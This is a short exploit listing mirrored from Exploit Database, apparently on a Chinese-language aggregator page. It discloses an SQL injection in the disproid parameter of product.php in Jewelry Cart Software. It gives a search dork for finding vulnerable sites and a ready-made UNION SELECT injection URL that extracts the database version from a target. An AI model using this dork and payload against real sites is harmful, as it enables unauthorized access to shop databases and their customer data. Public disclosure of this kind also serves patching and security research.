Jewelry Cart Software – ‘product.php’ SQL Injection

• Exploit Database
• 34 阅读

• 作者： Asyraf
  日期： 2010-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11826/

• **************************************************************
  
  # Name : Jewelry Cart Software SQL Injection (product.php) ::-
  # Author : Asyraf (Mycrypto Security Force) r0x~!!
  # Date : 20/3/2010
  # Language : PHP
  # Script : Jewelry Cart Software
  # Shout : hMSecurity,n3wb0rn,TBD Security
  
  # Dork : Powered by Jewelry Cart Software
  product.php?disproid=
  
  # Vulnerability : product.php?disproid=[ANY VALUE]
  
  # Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--
  
  ***************************************************************